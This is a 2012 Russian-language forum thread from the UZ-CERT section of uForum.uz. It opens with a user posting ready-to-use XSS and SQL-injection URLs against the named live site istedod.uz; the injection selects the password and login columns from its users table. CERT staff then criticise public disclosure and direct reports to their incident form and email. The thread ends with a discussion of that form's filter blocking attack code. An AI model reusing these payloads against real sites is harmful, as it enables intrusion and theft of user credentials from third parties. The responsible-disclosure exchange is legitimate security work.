Моё меню Общее меню Пользователи Правила форума Все прочитано
Вернуться   uForum.uz > ИКТ и телеком > Информационная безопасность > UZ-CERT
Знаете ли Вы, что ...
...до того как открыть новую тему, стоит использовать поиск: такая тема уже может существовать.
<< Предыдущий совет - Случайный совет - Следующий совет >>

UZ-CERT Отдел информационной безопасности ЕИ UZINFOCOM (cert.uz)


Ответить

 
Опции темы Опции просмотра
Старый 23.08.2012 23:15   #1  
Аватар для insider
Оффлайн
Engineer
Сообщений: 509
+ 45  169/112
– 0  12/9

Uzbekistan
Exclamation istedod.uz - XSS, SQL injection

Код:
http://istedod.uz/?page&pid=8--%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Код:
http://istedod.uz/?page&pid=8%20and%201=0%20union%20select%201,parol,3,login%20from%20users%20--
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка
Ответить 
Старый 24.08.2012 02:51   #2  
Аватар для Abdurohman
Оффлайн
Программист 1С
Сообщений: 1,453
+ 130  479/290
– 34  78/44

Uzbekistan
insider, Вы сообщили сперва владельцу сайта?!
Ответить 
Старый 24.08.2012 09:43   #3  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
Код:
http://istedod.uz/?page&pid=8--%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Код:
http://istedod.uz/?page&pid=8%20and%201=0%20union%20select%201,parol,3,login%20from%20users%20--
Было бы лучше, если бы Вы сообщали напрямую владельцам, либо в Службу UZ-CERT об обнаруженных угрозах на веб-сайтах в доменой зоне .UZ Публичное размещение уязвимостей, может повлечь за собой возможные взломы и компрометацию этих ресурсов, что может неблагоприятно сказаться на их работе.
Ответить 
"+" от:
Старый 24.08.2012 09:47   #4  
Аватар для Eldar Ishimbaev
Оффлайн
Сообщений: 4,884
+ 433  2,393/1,396
– 12  37/21

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Публичное размещение уязвимостей, может повлечь за собой возможные взломы и компрометацию этих ресурсов
Ну или проблемы для того, кто разместил данную информацию.
Ответить 
"+" от:
Старый 25.08.2012 08:21   #5  
Аватар для insider
Оффлайн
Engineer
Сообщений: 509
+ 45  169/112
– 0  12/9

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Публичное размещение уязвимостей, может повлечь за собой
немедленное исправление недостатков.

Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
либо в Службу UZ-CERT
http://cert.uz/incident/
а если я не собираюсь сообщать Место работы,Телефоны и всякую инфу ?
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка
Ответить 
Старый 25.08.2012 08:31   #6  
Аватар для insider
Оффлайн
Engineer
Сообщений: 509
+ 45  169/112
– 0  12/9

Uzbekistan
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка
Ответить 
Старый 25.08.2012 12:08   #7  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Публичное размещение уязвимостей, может повлечь за собой
немедленное исправление недостатков.

Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
либо в Службу UZ-CERT
http://cert.uz/incident/
а если я не собираюсь сообщать Место работы,Телефоны и всякую инфу ?
Если Вы не хотите сообщать данную информацию, можете отправить анонимное сообщение, указав вымышленные данные, либо написать на почтовый ящик cert@uzinfocom.uz.
Ответить 
Реклама и уведомления
Старый 25.08.2012 12:09   #8  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.
Ответить 
Старый 28.08.2012 10:20   #9  
Аватар для insider
Оффлайн
Engineer
Сообщений: 509
+ 45  169/112
– 0  12/9

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Цитата:
Сообщение от insider Посмотреть сообщение
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.
При отправке

Тема сообщения: freshmusic.uz - XSS
Ваше имя: insider
Место работы: ХХХ
Должность: ХХХ
Телефон, факс: 222-55-66
Электронная почта: aaa@aa.aa
Просим вас указать ... :
Код:
http://freshmusic.uz/abc.php?type= << XSS >>
Возникает ошибка.

Возможно стоит фильтр POST данных которая реагирует на некоторые ключевые слова.
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка

Последний раз редактировалось Dmitry Paleev; 28.08.2012 в 12:46.
Ответить 
Старый 28.08.2012 12:45   #10  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Цитата:
Сообщение от insider Посмотреть сообщение
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.
При отправке

Тема сообщения: freshmusic.uz - XSS
Ваше имя: insider
Место работы: ХХХ
Должность: ХХХ
Телефон, факс: 222-55-66
Электронная почта: aaa@aa.aa
Просим вас указать ... :

Возникает ошибка.

Возможно стоит фильтр POST данных которая реагирует на некоторые ключевые слова.
Вы правы, стоит фильтрация. В форме блокируется передача опасных символов. В случае, если вы хотите оповестить о наличии уязвимостей типа SQL, PHP, XSS с отправкой кода самой уязвимости, в этом случае рекомендуется писать на электронную почту cert@uzinfocom.uz.
Ответить 
Ответить
Опции темы
Опции просмотра




Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
OOO «Единый интегратор UZINFOCOM»


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх